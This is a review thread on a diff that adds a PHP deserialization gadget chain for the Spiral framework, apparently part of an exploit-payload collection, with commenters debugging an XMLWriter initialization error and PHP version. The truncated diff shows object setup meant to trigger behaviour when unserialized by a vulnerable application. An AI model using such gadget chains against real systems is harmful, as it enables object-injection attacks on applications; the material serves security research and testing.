gadgetchains/Spiral/INFO/1/gadgets.php

```diff
@@ -0,0 +1,54 @@
+<?php
+
+namespace App
+{
+	class App
+	{
+		protected $finalizer;
+
+		function __construct()
+		{
+			$this->finalizer = new \SebastianBergmann\CodeCoverage\Report\Xml\Coverage();
+		}
+	}
+}
+
+namespace SebastianBergmann\CodeCoverage\Report\Xml
+{
+	class Coverage
+	{
+		private $writer;
+		private $contextNode;
+
+		function __construct()
+		{
+			$this->writer = new \XMLWriter;
```

Comment:
`Uncaught Error: Invalid or uninitialized XMLWriter object in .../vendor/phpunit/php-code-coverage/src/Report/Xml/Coverage.php:62`

Reply:
I am also confused,  this gadget works well in my computer. In fact, look at the `__construct` code:
~~~php
public function __construct(DOMElement $context, string $line) {
        $this->contextNode = $context;
        $this->writer = new XMLWriter;
        $this->writer->openMemory();
       ......
    }
~~~
I can't figure out how this will happen ...

Reply:
What's your PHP version? It looks like it is due to deserialisation.

Reply:
PHP 7.4.3 (cli) (built: Feb 18 2020 17:29:57) ( NTS Visual C++ 2017 x64 )